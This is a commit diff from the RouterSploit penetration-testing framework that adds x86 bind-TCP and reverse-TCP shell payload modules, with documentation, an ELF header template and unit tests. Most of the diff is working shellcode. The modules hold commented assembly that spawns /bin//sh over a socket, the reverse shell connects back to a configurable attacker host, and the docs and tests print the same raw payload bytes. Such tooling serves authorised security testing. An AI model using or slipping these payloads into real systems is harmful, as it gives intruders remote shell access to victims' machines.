Adding bind and reverse shell payloads for x86 architecture (#454)

lucyoa · web-flow · commit 5eeb6e9ed9b1 · 2018-06-10T19:50:19.000+02:00
diff --git a/docs/modules/payloads/x86/bind_tcp.md b/docs/modules/payloads/x86/bind_tcp.md
@@ -0,0 +1,31 @@
+## Description
+
+Module generates payload that creates interactive tcp bind shell for X86 architecture.
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/x86/bind_tcp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates x86 bind shell tcp payload
+
+## Scenarios
+
+```
+rsf > use payloads/x86/bind_tcp
+rsf (X86 Bind TCP) > set rport 4321
+[+] rport => 4321
+rsf (X86 Bind TCP) > run
+[*] Running module...
+[*] Generating payload
+[+] Building payload for python
+payload = (
+    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
+    "\x5b\x5e\x52\x68\x02\x00\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a"
+    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
+    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
+    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
+    "\x0b\xcd\x80"
+)
+```
diff --git a/docs/modules/payloads/x86/reverse_tcp.md b/docs/modules/payloads/x86/reverse_tcp.md
@@ -0,0 +1,32 @@
+## Description
+
+Module generates payload that creates interactive tcp reverse shell for X86 architecture.
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/x86/reverse_tcp`
+  3. Do: `set lhost 192.168.1.4`
+  4. Do: `set lport 4321`
+  5. Module generates x86 reverse shell tcp payload
+
+## Scenarios
+
+```
+rsf > use payloads/x86/reverse_tcp
+rsf (X86 Reverse TCP) > set lhost 192.168.1.4
+[+] lhost => 192.168.1.4
+rsf (X86 Reverse TCP) > set lport 4321
+[+] lport => 4321
+rsf (X86 Reverse TCP) > run
+[*] Running module...
+[*] Generating payload
+[+] Building payload for python
+payload = (
+    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
+    "\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68"
+    "\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
+    "\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+    "\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
+)
+```
diff --git a/routersploit/core/exploit/payloads.py b/routersploit/core/exploit/payloads.py
@@ -24,13 +24,15 @@
 )
 
 
-architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE"])
+architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64"])
 payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"])
 
 Architectures = architectures(
     ARMLE="armle",
     MIPSBE="mipsbe",
     MIPSLE="mipsle",
+    X86="x86",
+    X64="x64",
 )
 
 PayloadHandlers = payload_handlers(
@@ -63,6 +65,14 @@
         b"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
         b"\x00\x10\x00\x00"
     ),
+    Architectures.X86: (
+        b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+        b"\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00"
+        b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
+        b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
+        b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
+        b"\x00\x10\x00\x00"
+    )
 }
 
 
diff --git a/routersploit/modules/payloads/x86/__init__.py b/routersploit/modules/payloads/x86/__init__.py
diff --git a/routersploit/modules/payloads/x86/bind_tcp.py b/routersploit/modules/payloads/x86/bind_tcp.py
@@ -0,0 +1,67 @@
+from routersploit.core.exploit import *
+from routersploit.core.exploit.payloads import (
+    ArchitectureSpecificPayload,
+    Architectures,
+    BindTCPPayloadMixin,
+)
+
+
+class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
+    __info__ = {
+        "name": "X86 Bind TCP",
+        "description": "Creates interactive tcp bind shell for X86 architecture.",
+        "authors": (
+            "Ramon de C Valle",  # metasploit module
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+
+    architecture = Architectures.X86
+
+    def generate(self):
+        bind_port = utils.convert_port(self.rport)
+
+        return (
+            b"\x31\xdb" +                  # xorl    %ebx,%ebx
+            b"\xf7\xe3" +                  # mull    %ebx
+            b"\x53" +                      # pushl   %ebx
+            b"\x43" +                      # incl    %ebx
+            b"\x53" +                      # pushl   %ebx
+            b"\x6a\x02" +                  # pushl   $0x02
+            b"\x89\xe1" +                  # movl    %esp,%ecx
+            b"\xb0\x66" +                  # movb    $0x66,%al
+            b"\xcd\x80" +                  # int     $0x80
+            b"\x5b" +                      # popl    %ebx
+            b"\x5e" +                      # popl    %esi
+            b"\x52" +                      # pushl   %edx
+            b"\x68\x02\x00" + bind_port +  # pushl   port
+            b"\x6a\x10" +                  # pushl   $0x10
+            b"\x51" +                      # pushl   %ecx
+            b"\x50" +                      # pushl   %eax
+            b"\x89\xe1" +                  # movl    %esp,%ecx
+            b"\x6a\x66" +                  # pushl   $0x66
+            b"\x58" +                      # popl    %eax
+            b"\xcd\x80" +                  # int     $0x80
+            b"\x89\x41\x04" +              # movl    %eax,0x04(%ecx)
+            b"\xb3\x04" +                  # movb    $0x04,%bl
+            b"\xb0\x66" +                  # movb    $0x66,%al
+            b"\xcd\x80" +                  # int     $0x80
+            b"\x43" +                      # incl    %ebx
+            b"\xb0\x66" +                  # movb    $0x66,%al
+            b"\xcd\x80" +                  # int     $0x80
+            b"\x93" +                      # xchgl   %eax,%ebx
+            b"\x59" +                      # popl    %ecx
+            b"\x6a\x3f" +                  # pushl   $0x3f
+            b"\x58" +                      # popl    %eax
+            b"\xcd\x80" +                  # int     $0x80
+            b"\x49" +                      # decl    %ecx
+            b"\x79\xf8" +                  # jns     <bndsockcode+50>
+            b"\x68\x2f\x2f\x73\x68" +      # pushl   $0x68732f2f
+            b"\x68\x2f\x62\x69\x6e" +      # pushl   $0x6e69622f
+            b"\x89\xe3" +                  # movl    %esp,%ebx
+            b"\x50" +                      # pushl   %eax
+            b"\x53" +                      # pushl   %ebx
+            b"\x89\xe1" +                  # movl    %esp,%ecx
+            b"\xb0\x0b" +                  # movb    $0x0b,%al
+            b"\xcd\x80"                    # int     $0x80
+        )
diff --git a/routersploit/modules/payloads/x86/reverse_tcp.py b/routersploit/modules/payloads/x86/reverse_tcp.py
@@ -0,0 +1,61 @@
+from routersploit.core.exploit import *
+from routersploit.core.exploit.payloads import (
+    ArchitectureSpecificPayload,
+    Architectures,
+    ReverseTCPPayloadMixin,
+)
+
+
+class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
+    __info__ = {
+        "name": "X86 Reverse TCP",
+        "description": "Creates interactive tcp reverse shell for X86 architecture.",
+        "authors": (
+            "Ramon de C Valle",  # metasploit module
+            "joev",  # metasploit module
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+
+    architecture = Architectures.X86
+
+    def generate(self):
+        reverse_ip = utils.convert_ip(self.lhost)
+        reverse_port = utils.convert_port(self.lport)
+
+        return (
+            b"\x31\xdb" +                     # xor ebx,ebx
+            b"\xf7\xe3" +                     # mul ebx
+            b"\x53" +                         # push ebx
+            b"\x43" +                         # inc ebx
+            b"\x53" +                         # push ebx
+            b"\x6a\x02" +                     # push byte +0x2
+            b"\x89\xe1" +                     # mov ecx,esp
+            b"\xb0\x66" +                     # mov al,0x66 (sys_socketcall)
+            b"\xcd\x80" +                     # int 0x80
+            b"\x93" +                         # xchg eax,ebx
+            b"\x59" +                         # pop ecx
+            b"\xb0\x3f" +                     # mov al,0x3f (sys_dup2)
+            b"\xcd\x80" +                     # int 0x80
+            b"\x49" +                         # dec ecx
+            b"\x79\xf9" +                     # jns 0x11
+            b"\x68" + reverse_ip +            # push ip addr
+            b"\x68\x02\x00" + reverse_port +  # push port
+            b"\x89\xe1" +                     # mov ecx,esp
+            b"\xb0\x66" +                     # mov al,0x66 (sys_socketcall)
+            b"\x50" +                         # push eax
+            b"\x51" +                         # push ecx
+            b"\x53" +                         # push ebx
+            b"\xb3\x03" +                     # mov bl,0x3
+            b"\x89\xe1" +                     # mov ecx,esp
+            b"\xcd\x80" +                     # int 0x80
+            b"\x52" +                         # push edx
+            b"\x68\x6e\x2f\x73\x68" +         # push n/sh
+            b"\x68\x2f\x2f\x62\x69" +         # push //bi
+            b"\x89\xe3" +                     # mov ebx,esp
+            b"\x52" +                         # push edx
+            b"\x53" +                         # push ebx
+            b"\x89\xe1" +                     # mov ecx,esp
+            b"\xb0\x0b" +                     # mov al,0xb (execve)
+            b"\xcd\x80"                       # int 0x80
+        )
diff --git a/tests/payloads/__init__.py b/tests/payloads/__init__.py
diff --git a/tests/payloads/x86/__init__.py b/tests/payloads/x86/__init__.py
diff --git a/tests/payloads/x86/test_bind_tcp.py b/tests/payloads/x86/test_bind_tcp.py
@@ -0,0 +1,21 @@
+from routersploit.modules.payloads.x86.bind_tcp import Exploit
+
+
+# bind tcp payload with rport=4321
+bind_tcp = (
+    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
+    b"\x5b\x5e\x52\x68\x02\x00\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a"
+    b"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
+    b"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
+    b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
+    b"\x0b\xcd\x80"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.rport = 4321
+
+    assert payload.generate() == bind_tcp
diff --git a/tests/payloads/x86/test_reverse_tcp.py b/tests/payloads/x86/test_reverse_tcp.py
@@ -0,0 +1,21 @@
+from routersploit.modules.payloads.x86.reverse_tcp import Exploit
+
+
+# reverse tcp with lhost=192.168.1.4  lport=4321
+reverse_tcp = (
+    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
+    b"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68"
+    b"\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
+    b"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+    b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.lhost = "192.168.1.4"
+    payload.lport = 4321
+
+    assert payload.generate() == reverse_tcp
